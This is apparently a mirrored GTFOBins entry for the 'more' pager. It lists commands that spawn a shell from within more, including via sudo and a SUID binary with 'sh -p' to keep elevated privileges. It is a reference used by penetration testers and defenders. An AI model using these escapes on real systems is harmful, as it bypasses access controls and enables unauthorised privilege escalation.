mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-12 23:12:06 +01:00
15 lines
273 B
Markdown
15 lines
273 B
Markdown
|
---
|
||
|
functions:
|
||
|
exec-interactive:
|
||
|
- code: |
|
||
|
TERM= more /etc/profile
|
||
|
!/bin/sh
|
||
|
sudo-enabled:
|
||
|
- code: |
|
||
|
TERM= sudo -E more /etc/profile
|
||
|
!/bin/sh
|
||
|
suid-limited:
|
||
|
- code: |-
|
||
|
TERM= ./more /etc/profile
|
||
|
!/bin/sh -p
|
||
|
---
|